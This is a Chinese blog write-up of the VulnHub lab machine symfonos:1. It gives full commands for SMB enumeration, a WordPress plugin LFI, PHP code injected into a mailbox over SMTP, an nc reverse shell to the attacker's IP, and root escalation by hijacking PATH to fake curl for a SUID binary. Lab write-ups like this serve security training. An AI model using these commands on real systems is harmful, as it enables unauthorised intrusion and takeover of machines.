vulnhub -symfonos1 (考点:smb & WordPress& LFI & 25 smtp & linux环境变量提权)

最新推荐文章于 2023-04-17 14:46:51 发布
最新推荐文章于 2023-04-17 14:46:51 发布
阅读量1.2k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105770882
版权

https://www.vulnhub.com/entry/symfonos-1,322/

nat网络
arp-scan -l 比平常多出来的ip就是靶机了

nmap

22要想到可能的ssh登录
25想到邮件服务,枚举用户或进去查看&伪造内容,等
80是web搜集信息
139 445 想到smb查看敏感内容

22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:EF:01:A1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2020-04-26T01:45:11-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-26T06:45:11
|_  start_date: N/A

有smb可以先看看smb
继续扫

enum4linux -a 192.168.189.205

看到两个目录,当然先看anonymous这个是匿名不要密码的
在这里插入图片描述

smbclient -N //192.168.189.205/anonymous

找到文件,发现提示,说密码太弱,总是这三个
在这里插入图片描述

可以猜测另一个用户helios的密码是不是这三个之中的一个

登录它的smb

smbclient -U "helios" //192.168.189.205/helios

测试输入qwerty可以登录

查看文件,找到新目录提示
在这里插入图片描述
然后网页80打开这个新目录
又看到写的another WordPress之类的,当然这又是靠WordPress博客漏洞了

要立马想到wpscan扫一扫看一看,要么扫用户,要么扫插件之类的

wpscan --url http://192.168.189.205/h3l105/ --plugins-detection aggressive

发现这个插件有感叹号提示说什么什么功能被打开了,

在这里插入图片描述
网上搜此插件漏洞
在这里插入图片描述

https://www.exploit-db.com/exploits/40290

根据底下的LFI提示来

http://192.168.189.205/h3l105//wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

存在漏洞
在这里插入图片描述

但是passwd这个LFI是不够用的,还要想到其他敏感目录

我们之前的25端口还没用。而邮件的路径默认在/var/mail/. 那么这个helios的邮件目录应该在/var/mail/helios
测试

http://192.168.189.205/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios

果然有
在这里插入图片描述

25是打开的,还可以伪造邮件,邮件里插弹shell代码,然后我再用这个LFI来读取邮件执行。

telnet 192.168.189.205 25
MAIL FROM: 666
RCPT TO: helios
data
<?php system($_GET['666']); ?>
.
QUIT

在这里插入图片描述
发送完毕,再到LFI里执行,先看看id命令

http://192.168.189.205/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&666=id

成功,最下面显示了id
在这里插入图片描述

把id换成 弹shell到你IP地址和端口4444或其他端口的命令 nc -e /bin/sh 192.168.xxx.xxxx 4444

就收到了shell了
变tty : python -c 'import pty; pty.spawn("/bin/bash")'

老套路linpeas.sh自动扫

没发现明显提示,但suid这个里面有个平常看不到的可疑文件
在这里插入图片描述

试试执行它,发现内容很像curl命令后的内容,curl用多了就很容易发现

helios@symfonos:/$ /opt/statuscheck
HTTP/1.1 200 OK
Date: Sun, 26 Apr 2020 07:23:09 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html

file看是啥,是程序

helios@symfonos:/opt$ file statuscheck 
statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped

靶机传到本机

nc 192.168.xxx.xxx 443 < statuscheck

本机接收

nc -nlvp 443 > s

ltrace看程序的内部call

C:\root> ltrace ./s
system("curl -I http://localhost"HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.17
Date: Sun, 26 Apr 2020 07:26:38 GMT
Content-type: text/html; charset=UTF-8
Content-Length: 5044

 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                    = 0
+++ exited (status 0) +++

果然是内部执行着curl命令
既然suid是以root身份的高敏感权限
我可以想办法利用环境变量改造curl。
真curl,一般在usr bin 下, 可以which curl 查看

但我可以在假curl里放我的恶意代码,root在 调用curl时,因为环境变量的原因,使用的并不是真正的环境里的curl,而是我的假curl

首先当然是再tmp里伪造,在这里我有高权限
伪造/bin/sh 提权命令 ,命名为curl
给予他执行权
改环境变量
实际上再执行,执行的是我tmp里的这个curl了

cd tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck

成功root,也可以看到,curl的环境被我改了,调用的是我tmp里的假curl
在这里插入图片描述

冬萍子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
symfonos: 1
战神/calmness的博客
12-26 962
目录 Name Download 信息收集 访问80端口 查看robots.txt 无果 目录遍历 发现139、445的smb 插件wordpress 漏洞进行文件包含 mail-masta 文件包含 mali文件查看 写入木马文件25端口 nc 反弹拿shell 交互python PATH变量提权 proof.txt Name Name: symfonos: 1 Date release: 29 Jun 2019 Author:Zayotic Series:...
Vulnhub-symfonos: 1
Demonering的博客
09-10 1330
摘要: 渗透大致流程: 通过Kali攻击机nmap扫描IP 扫描开放端口号并查看对应服务 通过发现的SMB服务使用enum4linux查看共享文件夹名和用户名,以及使用smbclient枚举查看 通过匿名用户anonymous发现用户helios的登陆密码 登录helios后发现提示目录文件 访问该网页发现为wordpress的网站 利用wpscan扫描发现两个漏洞插件 使用searchsploit查找对应漏洞payload(利用本地文件包含漏洞) 利用本地文件包含/var/mail/h
Vulnhub靶机 symfonos.local 1
菜浪马废的博客
09-25 187
得到了一个用户名和三个密码 尝试登录 helios:qwerty 下载文件查看内容 第一个 Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) whi...
vulnhub靶场,SYMFONOS: 1
kukudeshuo的博客
09-03 902
vulnhub靶场,SYMFONOS: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/symfonos-1,322/ 攻击机:kali(192.168.109.128) 靶机:SYMFONOS: 1(192.168.109.174) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.174 使用nmap扫描查看目
oscp——symfonos:1
王嘟嘟的博客
01-15 1472
0x00 前言 这个是练习的第四个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-1,322 参考文章 https://www.jianshu.com/p/4dec72be5498 0x01 实验 1.信息收集 1.1 目标IP 1.2 目标端口 22,25,80,139,445 2.攻击尝试 2.1 端口攻击尝试 21端口,就算知道没用也是要爆...
lfi-fuzz:用于枚举并尝试从LFI漏洞获取代码执行的python脚本
05-04
选项:-h,--help显示此帮助消息并退出-u URL,--url = URL您要测试的URL: : page LFI --traversal -file = TRAVERSAL_FILE(OPTIONAL)指定您自己的文件以使用LFI搜索-默认情况下为/ etc / passwd,但是某些php...
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 127.0.0.1 www.baidu.com www.google.com 2,python threading-find-port-8009.py 将会生成8009.txt,作用为扫描ip.txt中域名/ ip查找开放8009...
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
为了复现这个漏洞,你需要搭建一个Linux环境并安装受影响版本的Tomcat。具体步骤如下: 1. 下载Tomcat 10.0.0-M4,并解压缩至 `/usr/local/tomcat`。 2. 修改 `/usr/local/tomcat/conf/context.xml` 文件,添加`...
nmap-nse-scripts:已定制或创建的Nmap NSE脚本
02-05
例如,"http-wordpress-login-lfi"脚本可能用来检查WordPress登录页面是否存在本地文件包含(LFI)漏洞,"http-wordpress-plugin-info"脚本可能用于获取安装的WordPress插件信息,以判断是否存在已知的安全风险。...
Awesome-Bugbounty-Writeups:灵感来自https的Bugbounty撰写的精选清单(Bug type wise)
03-19
内容跨站点脚本(XSS)跨站请求伪造(CSRF) Clickjacking(UI纠正攻击)本地文件包含(LFI)子域接管拒绝服务(DOS)身份验证绕过 SQL注入(SQLI)不安全的直接对象引用(IDOR) 2FA相关问题与CORS相关的问题服务器...
提权信息收集自动化脚本-LinPEAS
04-10
该工具是纯bash脚本,通用性很好,能够收集上述几乎所有的提权信息,足够全面。但运行时间长,效率低,得到的信息虽然全面,但重点不够突出,有较多无用信息,稍显冗杂。 使用方式为: ./linpeas.sh
服务器提权工具
04-22
服务器提权
Mysql 权限提权实例教程.doc
01-03
Mysql权限提取实例教程, 利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,(降权也可以提,没降权的话就最好了),是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码
LFI本地包含漏洞介绍php的
03-24
LFI本地包含漏洞介绍php的 这个是最新的2011年最新公布的。
Symfonos 1--VulnHub系列学习记录
weixin_45509443的博客
08-01 831
纪要:知识点1.enum4linuxsmbclient枚举查看smb服务 2.了解文件包含到邮件日志反弹shell,掌握smtp邮件服务写入命令,对邮件等日志文件目录需要熟悉; 3.掌握PATH变量提权 1.主机发现,端口扫描 2.发现139/445端口开启smb服务,运用enum4linuxsmbclient枚举查看 enum4linux 192.168.31.81 枚举发现共享目录anony...
Vulnhub靶场之symfonos:1
SoporAeternus12的博客
04-16 3361
靶场的下载地址: 信息收集 nmap -sP 192.168.157.145/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 09:45 EDT Nmap scan report for 192.168.157.2 Host is up (0.00055s latency). Nmap scan report for 192.168.157.158 Host is up (0.00016s latency). Nmap scan repor
Vulnhub】之symfonos1
最新发布
zg_111的博客
04-17 493
在attention.txt我们发现三个密码:epidioko、qwerty、baseball,使用这三个密码尝试去访问下helios文件夹,发现使用qwerty密码可访问成功。发现helios和anonymous两个文件夹,我们依次去访问下这两个文件夹,发现anonymous文件夹没有密码也可访问,并在文件夹下发现了attention.txt。80端口暂时没有发现可利用点,前面nmap扫描发现靶机还开放了smb端口,所以我们使用smbclient工具列出靶机的共享文件夹。
学习笔记-symfonos1-WalkThrough
人饭子的博客
11-04 266
symfonos1-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 靶机地址 https://www.vulnhub.com/entry/symfonos-1,322/ Description Beginner real life based machine designed to teach a i...
symfonos靶机
haha1314的博客
08-10 759
一、 信息收集 存活主机 开放端口 Enum4linux 猜测aeolus可能为用户名 尝试爆破:sergioteamo 登陆 4 转到msf里面 在检查网络相关信息时,发现可疑之处,靶机一直监听其本机的8080端口,且只允许来自靶机自身的连接 这里自然想到利用端口转发,此处利用portfwd端口转发/重定向工具,其集成到metasploit内, 然后访问自己的9000端...
Fortinet NSE4-FGT-7.0 考试指南:LFI漏洞与Web过滤配置详解
"NSE4_FGT-7.0-DG-RE-lfi2xs学习文档手册.pdf"提供了针对Fortinet NSE4认证的详细资料,专注于FortiGate 7.0产品的网络安全专业知识。这份文档涵盖了两个考试相关的重点问题及其解答,旨在帮助学习者深入理解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值